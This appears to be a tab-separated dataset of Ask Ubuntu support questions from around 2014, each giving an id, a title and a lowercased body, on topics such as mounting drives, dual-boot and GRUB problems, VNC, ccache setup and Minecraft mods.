465948	ca n't get sd card or usb drive to mount	here is some info if it helps : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0001d643 device boot start end blocks id system /dev/sda1 * 2048 617056255 308527104 83 linux /dev/sda2 617058302 625141759 4041729 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 617058304 625141759 4041728 82 linux swap / solaris david @ davidnotebook : ~ $ dmesg|tail [ 26.494669 ] usb 2-1.2 : device descriptor read/64 , error -32 [ 26.670618 ] usb 2-1.2 : device descriptor read/64 , error -32 [ 26.846561 ] usb 2-1.2 : new low-speed usb device number 9 using ehci_hcd [ 27.254316 ] usb 2-1.2 : device not accepting address 9 , error -32 [ 27.326413 ] usb 2-1.2 : new low-speed usb device number 10 using ehci_hcd [ 27.734166 ] usb 2-1.2 : device not accepting address 10 , error -32 [ 27.734298 ] hub 2-1:1.0 : unable to enumerate usb device on port 2 [ 29.884452 ] ieee80211 phy0 : brcms_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 36.355344 ] wlan0 : no ipv6 routers present [ 56.995012 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 000d0000 , was 14000000 david @ davidnotebook : ~ $ mount | grep mmc david @ davidnotebook : ~ $ sudo mount -t vfat /dev/mmcblk0p1 /mnt -o defaults , rw mount : special device /dev/mmcblk0p1 does not exist david @ davidnotebook : ~ $ sudo dosfsck -a /dev/mmcblk0p1 dosfsck 3.0.12 , 29 oct 2011 , fat32 , lfn open : no such file or directory
465950	vnc into ubuntu 12.04 from windows upon boot without monitor , keyboard	on ubuntu , i enabled desktop sharing , and vnc to ubuntu from windows 7 is working great . but , i need to be able to log into ubuntu upon reboot , without keyboard and monitor . so , i followed this instruction to setup tightvnc : 'https : //www.digitalocean.com/community/articles/how-to-setup-vnc-for-ubuntu-12' but problem with this approach is that , the desktop i log into is different than when i log into ubuntu as a normal user . so is there a simple solution to start remote desktop sharing upon boot , without monitor/keyboard/mouse plugged into the ubuntu host ?
465951	difference between & , disown and nohup ?	lets take for example a program name x : in terminal : x & or : nohup x or : x & disown question here what is the main difference between each command are n't they aim for the same goal make a program work in background ?
465953	how to prevent switching print key shortcut back ?	i 've set my print key to take a screenshot of an area , but every time i logout and login it changes back to take a screenshot ( of full screen ) without unsettin the old one ? ! and saves the full screen until i change it back . how can i prevent this ? ! edit : sorry , my first explanation was badly understandable , i will try once more : i assign the print to the area screenshot . in that case , it prompts window saying that it is already assigned to fullscreen screenshot , i say ok. then , i logout and login and print is assigned automatically to fullscreen screenshot and without overwriting the area screenshot
465955	why is my screenshot just of the splash screen ?	below is all i see when i take a screenshot using the print screen key on my desktop . the application that pops up with the option to save/copy the screenshot is just called `` screenshot '' . i also had this problem on a previous version of ubuntu , but then only saw a black screen . i 'm using virtualbox to run this vm , but i 'm not sure if that 's the problem . has anyone else experienced this ?
465956	14.04 installation fail	i had 12.04 installed on windows 7 and was having issues upgrading to 14.04 . i did n't document exactly what happened but whatever i tried , after a while the process just seemed to freeze and despite waiting a while it was virtually unresponsive . i decided to uninstall 12.04 and install 14.04 by downloading the 64-bit version of the iso file and use the dvd to boot into and eventually install ubuntu . first off , i could n't connect to the wifi because it kept complaining about the password even though i verified it was correct . i decided to use a wired connection and proceed but every time i try to proceed beyond the screen where it asked whether you want to install ubuntu in windows 7 , after choosing that option and clicking continue the process would abort and print this message on screen wait-for-state stop/waiting *stopping rsync daemon rsync [ ok ] *speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining process to terminate [ ok ] *all processes ended within 1 seconds ... [ ok ] modemmanager [ 1368 ] : < info > caught signal , shutting down ... modemmanager [ 1368 ] : < info > modemmanager is shut down . nm-dispatcher.action : caught signal 15 , shutting down ... *unmounting temporary files system ... [ ok ] *deactivating swap ... [ ok ] *stopping early crypto disks ... [ ok ] ( i hope i copied this correctly . could n't cut and paste ) the disk would then eject and nothing else happens . i have to shut down the computer and reboot . anybody have any idea what 's happening here or what 's the work-around ?
465957	how to boot into single user mode in 14.04	i am trying to switch to single user mode in 14.04 . i tried sudo telinit 1 but this never gives you a prompt . i then tried editing the boot options from the grub menu when i reboot . i see a line that ends ro quiet splash $ vt_handoff but if you add the word single in there you never get a prompt . this problem appears to be reproducible by others . how do you get into single user mode ?
465965	advanced inertial scrolling configuration	is it possible configure the synaptic inertial scrolling in a way so it is disrupted when any key is pressed on the keyboard ? to explain this question : i often use shortcuts . now when i am for example browsing the web and scroll back to the top of a website using inertial scrolling , i zoom the site like crazy if i try to open a new tab with ctrl+t because the browser only detects ctrl+scrolling . this happens in a lot of applications and is really annoying . i used to like inertial scrolling but as long as this problem persists , i have to disable it .
465967	is it possible to record from a midi keyboard to audacity ?	i am trying to make it so that i can record from audacity using a midi keyboard . normally i use qjackctl , zynaddsubfx and ardour . the problem that i run into is exporting to an mp3 . in an earlier question i learned how to import it from ardour , but i am wondering if there is an easier way to do this . can i simply record from my midi keyboard to audacity ? thank you all again for your help , your knowledge and generosity are invaluable .
465969	how to get autocompletion with `` > | '' ?	when trying to empty a text file with > | filename why does n't bash 's autocomplete work for the file name ? is there anyway to allow autocompletion like any other terminal command ?
465973	why did /usr/lib/php5/sessionclean run 50 times simultaneously on my 14.04 system ?	when i sat down at my ubuntu 14.04 system this morning , the root cron job /usr/lib/php5/sessionclean was running over 50 times at once , producing 50+ copies of the following commands : root 8147 0.0 0.0 65852 1580 ? s may13 0:00 cron root 8148 0.0 0.0 4444 648 ? ss may13 0:00 /bin/sh -c [ -x /usr/lib/php5/maxlifetime ] & & [ -x /usr/lib/php5/sessionclean ] & & [ -d /var/lib/php5 ] & & /usr/lib/php5/sessionclean /var/lib/php5 $ ( /usr/lib/php5/maxlifetime ) root 8153 0.0 0.0 4444 648 ? s may13 0:00 /bin/sh /usr/lib/php5/sessionclean /var/lib/php5 24 root 8154 0.0 0.0 7328 644 ? s may13 0:00 /usr/bin/lsof -w -l +d /var/lib/php5 root 8155 0.0 0.0 7544 688 ? s may13 0:00 awk -- { if ( nr > 1 ) { print $ 9 ; } } root 8156 0.0 0.0 7480 612 ? s may13 0:00 xargs -i touch -c { } root 8157 0.0 0.0 7328 108 ? d may13 0:00 /usr/bin/lsof -w -l +d /var/lib/php5 system load was 60+ . this has never happened before . any hypotheses ? at the same time , one of my nfs mounts ( /mnt/foo/bar ) went down while an rsync job was writing to it , so rsync was hanging . could that be related ?
465974	uninstall ubuntu from windows 8	i have installed ubuntu 14.04 on my windows 8 but i have a problem in grub menu . there i ca n't get windows boot option so i had change the booting options in bios to enter into different operating systems . so please tell me how to un install ubuntu 14.04 from my windows 8 pc .
465979	funny colours in desktop after fresh installation of 14.04lts	i have problem with fresh installation of ubuntu 14.04 , i havent installed anything but this is what i saw http : //postimg.org/image/btfnarkdn/ . then i installed nvidia drivers but it is still same . as you can see , in the top bar font is black and the bar itself is transparent , which i think shouldnt be . also buttons in windows look really weird . anyone to help me ?
465980	will ubuntu 14.04 lts or later wubi installer be returing	will wubi instaler ever be returning in ubuntu 14.04 or later i have a friend that really wants ubuntu and is upset becuase he cant figure out how to create a partition on his hp pavilion g6 64bit laptop . i have tried many times to help him but i can not figure out how to boot form a live usb on his version of bios . his version of bios is insyde h20 . despite i did it on my computer and have a successfull dual-boot with windows 8.1 64 bit and ubuntu 14.04 64 bit with a similar bios version . i would also really appreciate if ubuntu.com could bring back the older wubi installer throught the iso file and just upgrade ubuntu manually once installed . i really appreciated yur time and i hope wubi will be brought back .
465982	how do i swap the cmd and ctrl key on a mac ?	i have been trying to switch the ctrl and cmd key on my macbook for a while , but nothing seems to work . a lot of the answers say to go to system settings > keyboard layout and change it there , but i have a brand new installation of ubuntu , and it does not have that feature . i 've also tried adjusting the xmodmap , which works for the current session , but when i reboot , the settings are n't saved . to try to save it , i have added the command `` xmodmap ~/.xmodmap '' to my startup applications , but that did n't work . i have also tried adding the command to the /etc/profile.d/myfile.sh file ( i also altered the permissions ) . i have tried the file ~/.xinitrc file and many other ways , but nothing seems to work . however , when i go to my shell and type in `` xmodmap ~/.xmodmap '' , it works . so , i 'm not sure what i 'm doing wrong here . does anyone have any idea what i 'm doing wrong ?
465984	ubuntu installer does n't see that windows is already installed	i have this very weird problem . i installed windows 7 professional first on my machine ( but i did n't select all the memory space , so i left about 500gb for ubuntu ) , and i was able to install windows fine . then when i installed ubuntu from usb , it 's not able to detect any os installed when i have windows installed and it thought it has all 1tb space available . would anyone know why this is so ? if i install ubuntu this way then my windows is automatically erased ... thanks !
465985	ubuntu refuses to load after a successful installation	i installed 14.04 with default settings and when i turn off the laptop and turn it back on , ubuntu refuses to boot up , instead asks me to insert a boot device . here 's the paste text from the boot repair : http : //paste.ubuntu.com/7464628/ the machine is toshiba c55-a-1m7 . how do i fix this ? thanks !
465988	convert multiple document files inside their current folders	i have a folder called x which inside has many folders and sub-folders . i want to search in all of the folders inside x and find a specific document type . for example xlsx and transform each file into an xls file . in this case i need to use the libreoffice convert option like libreoffice -- headless -- convert-to xls but here is the catch . after conversion each converted file should be in the same folder as the original xlsx file . example : x/ folder 1/ folder 2/ folder 2.1/file.xlsx folder 3/ folder 4/ folder 4.1/anotherfile.xlsx after conversion : x/ folder 1/ folder 2/ folder 2.1/file.xls folder 2.1/file.xlsx folder 3/ folder 4/ folder 4.1/anotherfile.xls folder 4.1/anotherfile.xlsx the new xls* in this case , will be converted on the same folder as the original xlsx . this will be done inside all sub-folders and to all xlsx that are found .
465992	how do you add the allegro library to codeblocks ?	i’m trying to add the allegro library to the codeblocks ide . until recently i had been using windows , which meant going to programs - > codeblock and then adding the libraries folders into the appropriate codeblocks folders , then going into codeblocks and taking care of the linkers . since linix doesn’t use this method i’m not really sure what where i put the folders , or what i’m supposed to do to be able to use allegro or other libraries in codeblocks on ubuntu .
465993	katesql with oracle ( xubuntu 14.04 )	i recently found out about kate editor and i liked it . i was even more happy when i saw katesql plugin . unfortunately it only supports mysql connect by default , but i need a way to connect to oracle db . can you please help me ?
465996	a fatal error has been detected by the java runtime environment	i wanted to install windriver workbench for vxworks development on my linux host . i got the correct license file and everything but my jre seems to crash , i get the error : launching installer ... # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x7adcf86d , pid=19272 , tid=3066465088 # # jre version : 6.0_21-b06 # java vm : java hotspot ( tm ) client vm ( 17.0-b16 mixed mode linux-x86 ) # problematic frame : # c [ libsoup-2.4.so.1+0x5486d ] soup_session_feature_detach+0x1d # # an error report file with more information is saved as : # /home/reg/windriver/maintenance/wrinstaller/x86-linux2/hs_err_pid19272.log # # if you would like to submit a bug report , please visit : # http : //java.sun.com/webapps/bugreport/crash.jsp # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . # any idea how i can fix this , the log in /home/reg/windriver/maintenance/wrinstaller/x86-linux2/hs_err_pid19272.log1 is huge but the very bottom portion looks like : vm arguments : jvm_args : -xmx256m -declipse.exitdata= -dorg.eclipse.equinox.p2.transport.ecf.retry=5 -dorg.apache.commons.logging.simplelog.log.httpclient.wire.header=error -dorg.apache.commons.logging.simplelog.log.org.apache.commons.httpclient=error -dorg.apache.commons.logging.simplelog.log.httpclient.wire=error -dorg.apache.commons.logging.log=org.apache.commons.logging.impl.simplelog -declipse.p2.max.threads=1 java_command : /home/reg/windriver/maintenance/wrinstaller/x86-linux2//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -os linux -ws gtk -arch x86 -showsplash -launcher /home/reg/windriver/maintenance/wrinstaller/x86-linux2/wrinstaller -name wrinstaller -- launcher.library /home/reg/windriver/maintenance/wrinstaller/x86-linux2//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.200.v20120522-1813/eclipse_1502.so -startup /home/reg/windriver/maintenance/wrinstaller/x86-linux2//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -- launcher.appendvmargs -exitdata 778001b -data @ none -sdf /media/reg/dvd-r147826.1-1-01/sdf.xml -installpath /home/reg/windriver -vm /home/reg/windriver/maintenance/wrinstaller/x86-linux2//jre/1.6.0_21/bin/java -vmargs -xmx256m -declipse.exitdata= -dorg.eclipse.equinox.p2.transport.ecf.retry=5 -dorg.apache.commons.logging.simplelog.log.httpclient.wire.header=error -dorg.apache.commons.logging.simplelog.log.org.apache.commons.httpclient=error -dorg.apache.commons.logging.simplelog.log.httpclient.wire=error -dorg.apache.commons.logging.log=org.apache.commons.logging.impl.simplelog -declipse.p2.max.threads=1 -jar /home/reg/windriver/maintenance/wrinstaller/x86-linux2//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar launcher type : sun_standard environment variables : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games ld_library_path=/home/reg/windriver/maintenance/wrinstaller/x86-linux2/jre/1.6.0_21/lib/i386/client : /home/reg/windriver/maintenance/wrinstaller/x86-linux2/jre/1.6.0_21/lib/i386 : /home/reg/windriver/maintenance/wrinstaller/x86-linux2/jre/1.6.0_21/../lib/i386 shell=/bin/bash display=:0 signal handlers : sigsegv : [ libjvm.so+0x4302b0 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigbus : [ libjvm.so+0x4302b0 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigfpe : [ libjvm.so+0x355940 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigpipe : sig_ign , sa_mask [ 0 ] =0x00001000 , sa_flags=0x10000000 sigxfsz : [ libjvm.so+0x355940 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigill : [ libjvm.so+0x355940 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigusr1 : sig_dfl , sa_mask [ 0 ] =0x00000000 , sa_flags=0x00000000 sigusr2 : [ libjvm.so+0x358580 ] , sa_mask [ 0 ] =0x00000000 , sa_flags=0x10000004 sighup : [ libjvm.so+0x3582b0 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigint : [ libjvm.so+0x3582b0 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigterm : [ libjvm.so+0x3582b0 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 sigquit : [ libjvm.so+0x3582b0 ] , sa_mask [ 0 ] =0x7ffbfeff , sa_flags=0x10000004 -- -- -- -- -- -- -- - s y s t e m -- -- -- -- -- -- -- - os : jessie/sid uname : linux 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:31:42 utc 2014 i686 libc : glibc 2.19 nptl 2.19 rlimit : stack 8192k , core 0k , nproc 15917 , nofile 4096 , as infinity load average:0.91 0.58 1.02 cpu : total 1 ( 1 cores per cpu , 1 threads per core ) family 6 model 58 stepping 9 , cmov , cx8 , fxsr , mmx , sse , sse2 , sse3 , ssse3 , sse4.1 , sse4.2 , popcnt memory : 4k page , physical 2063836k ( 165332k free ) , swap 1046524k ( 639400k free ) vm_info : java hotspot ( tm ) client vm ( 17.0-b16 ) for linux-x86 jre ( 1.6.0_21-b06 ) , built on jun 22 2010 01:22:50 by `` java_re '' with gcc 3.2.1-7a ( j2se release ) time : wed may 14 14:09:54 2014 elapsed time : 148 seconds
465997	problem mount cdrom under ubuntu 14.04	i have just installed vmware 10 on my dell pc , and installed ubuntu 14.04 . now i am having trouble mount /cdrom . here 's what i have tried : mkdir /mnt/cdrom mount /dev/sr0 /mnt/cdrom mount : no medium found on /dev/sr0 actually , i do have a cd in the cdrom , and window 8 was able to read document out of this cd . i need advice on how to resolve this error . i am a newbie here . thanks !
466000	gmail html app on launcher feedback	i 'm on the ubuntu 14.04 and i have installed gmail in the html app launchable from laucher . i need help where i can send my feedback about this app , because in stock ubuntu touch browser gmail and every other app seems to lag when clicking on link ( which opens in chrome ) and stop working after clicking the link . i need more information about where and to whom i can contact to make this work better .
466004	when i close my laptop lid and reopen my machine suspends	i have this weird problem with my new xubuntu 14.04 installation . when i close my laptop lid , the box will suspend alright . after i decide to reopen my box to continue what am doing the screen will flicker and ask me to login . after i supply the password , the screen will go dark and the hd led will appear busy for a while and thats it . i always reboot my box . i hope i have been clear on the nature of the problem .
466005	gnu radio and usrp1	i 'm confused after all things i read on internet . can anyone tell me for sure does gnu radio 3.7 support usrp1 transceiver unit on ubuntu 14.04 ? is that combination able to work properly with openbts software ? thanks !
466006	bluetooth and wifi of high bandwidth do n't work	i am using ubuntu 14.04 . my bluetooth is not working ; it shows no adapter found . wifi of high bandwidth is also not working . in the drivers section there are no drivers available for bluetooth and wireless . how can i download proprietary drivers for my laptop to fix these problems .
466007	hp evny m6 k025dx touch screen	when i first installed it 14.04 on a new hdd the touch screen worked flawlessly , i had pinch to zoom . then in stalled linux mint and did n't like it and went back to ubuntu 14.04 64bit , and updated ( i think ) i was n't able to pinch to zoom at all . any ideas is there a driver i need ? or a setting ?
466009	what is the official ubuntu server ami ?	i would like to use the latest ubuntu server on amazon ec2 . what are the right ami for me to use ?
466013	user has no permissions in sftp	i installed lamp in my digital ocean droplet . i have successfully logged in to sftp . however , when i try to do anything in my /var/www/html/ folder it says permission denied . it may be worth mentioning my user has these privileges in visudo # user privilege specification root all= ( all : all ) all username all= ( all : all ) all does anyone know what i can do to allow my new user to securely make changes and upload things ?
466015	mix stereo sound through only one speaker	i burned the right speaker of my laptop when playing some black metal . i want to mix the right output with the output of the left speaker , for all programs . i think that pulseaudio can do some here ... but i do n't know how to . is possible joint stereo for one-speaker ? thanks in advance .
466017	how to install previous version of maven ( 3.0.4 ) ?	the way my maven packages are configured , something breaks when i have the latest version installed ( i think 3.4 ) . on another computer , where i have 3.0.4 , the build runs fine . i am looking for a way to install a previous version using apt-get . i followed these instructions and they completed fine but when i ran mvm -v , i got the following error , so something must have been wrong with the tar ball : [ error ] unknown lifecycle phase `` âv ''
466018	executable text file ( like a bat file ) that will automatically run in a new terminal when you open it	basically i want to make a file that when i open it normally , it opens a new terminal and runs a set command that i preset into it . here 's an example : i open a file with gedit , i type in , sensors , save it , close the file and then open it normally . when it opens , it automatically makes a new terminal and runs the command sensors . i have been trying to find this for a while and i have n't been able to find much at all . i 've tried making it a .sh file and i 've added # ! /bin/bash and # ! /bin/sh , but neither of them seemed to work .
466019	where do i buy the ubuntu phone ?	hi would like to ask where you can order the ubuntu phone as seen in the picture in the phone section on the website anyone know ?
466022	appletouch not working properly lubuntu	i just made a clean install of lubuntu 14.04 on a macbook 3,1 , and i got most of the hardware working except for the touchpad . two fingers are recognized because i can scroll through websites , clicking works as well , though tapping and swiping do n't work . when i really press on the touchpad hard the pointer moves , but only then . i do n't have any problems with the touchpad in mac osx . i installed gpointing-device-settings and the appletouch touchpad is recognized as such , yet the swiping is n't working even tough it is n't disabled . is there a way i can put the touchpad more sensitive or something ? edit : today i ran boot repair and weirdly enough the mousepad worked ( almost ) perfectly . it looks like boot repair is based on lubuntu 13.04 ( raring ) . so it works on the 64 bit lubuntu 13.04 boot repair usb boot , but not on the 32 bit lubuntu 14.04 boot from the internal hdd . why ... ? and how can i make it to work on my main boot too ?
466023	14.04 mongodb does not start with start command	mongodb runs from command line , but when the start mongod command is used it gives the message at the bottom . if i do sudo start mongod i get mongod start/running , process 1433 but there is nothing running . status command gives : mongod stop/waiting directory permissions are : mongod : mongod so how can i overcome this ? start mongod start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.57 '' ( uid=1000 pid=2221 comm= '' start mongod `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init `` )
466029	ubuntu 14.04 partition is missing	i 'm using windows 7 and ubuntu 14.04 in a 1 tb hard disk . 1 month ago i shrank 97 gb of space from the c drive and i have installed ubuntu in that space . it was all working fine until this morning . today ubuntu hard disk is full so i have to add a another partition to mount in ubuntu . so i restarted my pc from ubuntu to windows 7 . in windows disk management i created a 200 gb new volume from unallocated space . then i restarted my pc . i was surprised to see a grub problem that made me unable to boot to either os . i inserted the ubuntu recovery disk and after that windows 7 alone started working . i ca n't find the ubuntu disk . i tried the ubuntu live cd . i ca n't see the ubuntu partition in the live cd . i 'm afraid now that my 97 gb ubuntu volume is showing free space in windows 7 disk management . i have no idea how it happened . boot-info : http : //paste.ubuntu.com/7465196/
466032	dual boot win8 with ubuntu 14.04 , ubuntu installer says `` no other os found ''	i wanted to dual boot win8 alonside ubuntu 14.04 . however , when i boot from usb stick , the display screen shows that `` no other os found '' and hence i can not install ubuntu alonside win8 . the only options i get are to install ubunbtu ( that would result in deletion of win8 ) or to create a partition ( which seems too complex ) . what to do ?
466035	no network manager after an upgrade to lubuntu 14.04	hello , i upgraded from lubuntu 13.10 to 14.04 and it got rid off my network manager i added it back to my tool bar but it doesnât show other networks available . how do i fix this problem ?
466037	how do you add mods to your minecraft on ubuntu ?	i 've been trying to add mods to my minecraft using the old way of putting them in the bin folder . however , i do not have a bin folder in my .minecraft folder . how do i get the bin folder or find a different way to add the mods . i have already tried using the magic launcher and it did not work . i also so tried ctrl-h to show the hidden items and the bin folder still did not show up . all help is appreciated ! thank you !
466038	can not boot : kernel panic not syncing	this is my first time asking questions here . i apologize for my poor english . i was using ubuntu 13.10 . while unzipping a passcode-locked file , my system crashed . since then when i try to boot the system , it shows : kernel panic not syncing attempted to kill init ! exitcode 0x00000007 more letters are shown after that . i can not boot any more . this is the picture of screen : https : //drive.google.com/file/d/0b0vvtd1xmntrbuxtq0xgrumwyk0/edit ? usp=sharing now i 've installed ubuntu 14.04 in another partition and am using the machine . specs of laptop are : dell vostro 1220 intel® core™2 duo cpu t6670 @ 2.20ghz × 2 64 bit 4gb memory i want to rescue ubuntu 13.10 , or at least rescue my personal data . i 'm pretty much a beginner but i understand a little bit of terminal commands . i 'm not very good with english , so if you can explain with simple words it will help . thank you very much . i really do need help .
466039	official kickstart documentation for ubuntu server 12.04 lts ?	i need to create a complex kickstart script for ubuntu server 12.04 lts . the `` automatic installation '' manual says : missing features as yet , the ubuntu installer only supports a subset of kickstart 's features . the following is a brief summary of features that are known to be missing : ... . ... . i have tried and actually there are way more features described in kickstart official manual are missing in 12.04 lts kickstart ... any chances to read to what exactly is included into this subset ? any `` official '' document for this ?
466045	global dns change	can someone help me change my dns server globally without having to do it manually thru network manager for every connection i have . i want to use opendns , whether its at home , uni , wifi hotspot , phone tether.. ubuntu 13.10
466050	quickly navigate from one path to another	i noticed that frequently i have to do something like this : i am in a path : /very/long/path/1 and i have to go to /another/long/path/ to do some things there . than i have to come back to my /very/long/path/1 . to make things worse sometimes another third path is there and i constantly switch from one to another . this is not a problem with cd , but is there a way of somehow store this paths and use them ? i am working from command line on some remote host .
466051	unresponsive to mouse pointer clicks in 14.04	recently upgraded from 13.10 but this started about a week after upgrading to 14.04 after installing upgrades . when i log in i can open anything from the launcher but the window becomes unresponsive and anything i click inside the window does not respond . i can use the keyboard to navigate the window , maximize , minimize the window . sometimes when i do this the window becomes responsive to the mouse pointer , but only that window . any other windows that are open are unresponsive . the only way to switch away from the window that has become responsive is to use the keyboard . top menu is unresponsive to the mouse pointer .
466052	can someone help me with my ncmpcpp and mpd	okay , so im running ubuntu 13.10 and my mpd was working fine yesterday and now its not working . so ncmpcpp says volume is at 100 % and so does mpc but its playing no sound you can find my dot files here i am running them locally so yeah
466054	mythtv .27 backend locks up when idle	since upgrading from mythtv .25 to .27 ( on 12.04 ) , i am unable to connect whenever the backend is idle . the backend still `` wakes up '' to record shows , conduct housekeeping , etc. , and at those times my frontends will connect normally . any suggestions are appreciated .
466056	grub install fails on software raid	i 've been trying to install ubuntu 14.04 on two 30gb ssds ( oczssd2-1agt30g ) with an asus motherboard ( asus dsbf-d ) . i tried installing on both of the drives separately and it seemed to work fine . the problem happens when i try to raid the two drives together and install . the main installation completes , but i 'm never able to install grub . error : unable to install grub in /dev/sdc executing 'grub-install /dev/sdc ' failed this is a fatal error . i 've tried installing grub on different drives as well as both drives in the array at once , but have n't had any luck . partitions : i ca n't post an image here , so here 's one on imgur . fdisk output : fdisk /dev/sda disk identifier : 0x00078d2a device boot start end blocks id system /dev/sda1 2048 54149119 27073536 fd linux raid autodetect /dev/sda2 54151166 62531583 4190209 5 extended /dev/sda5 54151168 62531583 4190208 fd linux raid autodetect fdisk /dev/sdc disk identifier : 0x0007faba device boot start end blocks id system /dev/sdc1 2048 54149119 27073536 fd linux raid autodetect /dev/sdc2 54151166 62531583 4190209 5 extended /dev/sdc5 54151168 62531583 4190208 fd linux raid autodetect the raid arrays all say : /dev/mdx does n't contain a valid partition table i have had ubuntu installed with raid on these drives before .
466057	install wowmatrix	i am trying to install wowmatrix ( http : //www.wowmatrix.com/ ) to manage my wow addons . however when running the .sh file it brings up an install window . but there is no text just blank buttons .
466058	how to disable the default `` move to the rubbish bin '' shortcut ( delete key ) ?	i 'm looking for some protection from accidentally deleting files in nautilus . currently , they are being moved to the rubbish bin when i hit the delete key and i want to replace it with ctrl+delete . i 've tried to change the ~/.config/nautilus/accels file so that it contains : ( gtk_accel_path `` < actions > /dirviewactions/trash '' `` < primary > delete '' ) this change adds another shortcut but does n't remove the previous one , i.e . now both delete and control+delete works . how can i disable the default one ? i 'm using ubuntu gnome 14.04
466059	how do i enable ccache	i am completely noob at this , i do n't know what the make file is , and i do n't know what bashrc is . but i do know where to download source code and use source somebash.sh then make file ( as was told by someone to run those commands ) i did some research and find out ccache can speed up sequential build speed , but i have no idea what am i suppose to do when reading those online instructions ( include ccache in path , what path , where and how , and gcc , colorgcc , bashrc , what are these ? ) so if someone can give a step by step instruction , that 'd be awesome .
466060	right click select program to open the file	i would like to select the program to open the file . i use right click , ubuntu automatically open the file using default program . for example , i want to to use gedit to open .pas file . ubuntu does not give me a chance to select , but open lazarus to open it . i go to system setting and adjust mouse double click speed , but no matter what i adjust , it keeps the same to open lazarus . i would like to know are there any place to adjust the speed for right click to let me select the program to open the files .
466064	missing unity bar and top bar in 14.04 , using nvidia , with slightly stretched graphics	i 'm new to ubuntu , so apologies for not knowing the correct lingo for everything . i just upgraded to 14.04 on my macbook pro 5,5 ( mid-2009 ) . 13.04 worked great , but i 'm having some issues with 14.04 . any help or advice would be greatly appreciated ! i 've combed through a lot of discussion threads on this forum and others that address this , trying various fixes , all to no avail . 1 ) i 'm missing the unity bar and top menu bar ( where it shows wifi , time , calendar , etc etc ) . ctrl-alt-t does n't get me terminal . installed unity tweak tool , reset unity , nothing is working . the top menu bar appears at the login screen , but disappears right after i enter my password and log in . ( i am able to open things via tty and command line ) . 2 ) the appearance of ... everything ... seems wonky . it 's like the aspect ratio is off - the image appears skinnier and taller than the screen -- for example , when i move my mouse to the bottom of the screen , the screen shifts , like i 'm pushing the edge of the screen down , and the image ( wallpaper , window , whatever i have open ) moves up . like the image does n't fit the screen somehow . i have a feeling that this is a graphics thing , and have updated and am using an nvidia driver ( 331 version ) . i have tinkered with the appearance setting , which did n't help . thank you in advance for any help , advice , potential tweaks , etc !
466065	adding mods to minecraft on ubuntu 14.04	so i have learned that there are no longer any bin folders or .minecraft folders on in the versions of minecraft 1.6 or higher . i still want to add mods though . is there a way to add the mods of my choice without using magic launcher or the bin folder ( since it does n't exist ) ? all help is appreciated . thank you : )
466068	enabling ccache in ubuntu for android development	http : //source.android.com/source/initializing.html # choosing-a-branch following the instruction , i installed ccache and edited .bashrc with export use_ccache=1 but when i start a build , and typed ccache -s in another terminal , i do not see cache hit . did i do something wrong ?
466070	how can i use the last version of frescobaldi ?	i have frescobaldi frescobaldi 2.0.7 with : python : 2.7.6 qt : 4.8.6 pyqt4 : 4.10.4 sip : 4.15.5 linux-3.13.0-24-generic-i686-with-ubuntu-14.04-trusty i knew that this is an older version so i asked synaptic . it said that the last version is 2.0.13+ds1-1 and i had no installed version ! i have installed it , but when i open frescobaldi it is still good old 2.0.7 who starts . what can i do ? thanks for any help .
466071	what type of partition table and file system is required to make a live usb ?	i see a bunch of stuff on using usb-creator to make a live usb for ubuntu which is great . what i do n't see is what type of partition table and file system is required on the usb itself . does it have to be fat32 ? please provide partition table id , and file system type as well as commands : sudo fdisk /dev/sdb # make bootable and chose id = c ( w95 fat32 ( lba ) ) sudo mkfs.vfat -n 'ubuntu ' /dev/sdb1
466073	ca n't resize partition	i 'm trying to make my windows partition bigger so i made my ubuntu partition 150 gbs smaller . now when i try to resize my windows partition it wo n't go bigger -- it only gives me the option to make it smaller . how do i enlarge my partition ?
466074	install grub after copy ubuntu	i need to install grub on a new hard drive . i have a 1tb hard drive with linux mint on it . i also have a dual boot 40gb hard drive with windows xp and ubuntu 12.04lts with grub to chose an os . i want to copy the ubuntu install from the 40 gb drive on to the bigger drive i have done this already ( http : //paste.ubuntu.com/7465749/ ) i have copied the ubuntu install and put it on the new hard drive with linux mint already on it using gparted in linux mint . so after i have done this how can i install grub on the 1tb drive to chose an os at boot ?
466083	dropdown menu is showing less items , when i right-click on the desktop	how would i add an office application on a drop-down menu ( from right-click ) ? when i right-click inside folders and on desktop it shows only a couple items , i want a windows-like drop-down menu . please how would i make this as default ?
466086	why when i try to download a theme does it say that it ca n't find the package .	i was trying to download a theme off of noobslab.com i was using the terminal commands and such . after the third command , it kept telling me that it was unable to locate the package . i 'm not sure what to do . can anyone help ?
466087	set individual file priority ( single torrent ) : transmission	is there a way to set priorities per file in a given torrent ? the files tab only lets me change the names of files and has no other option . if not , is there other software that will do this ?
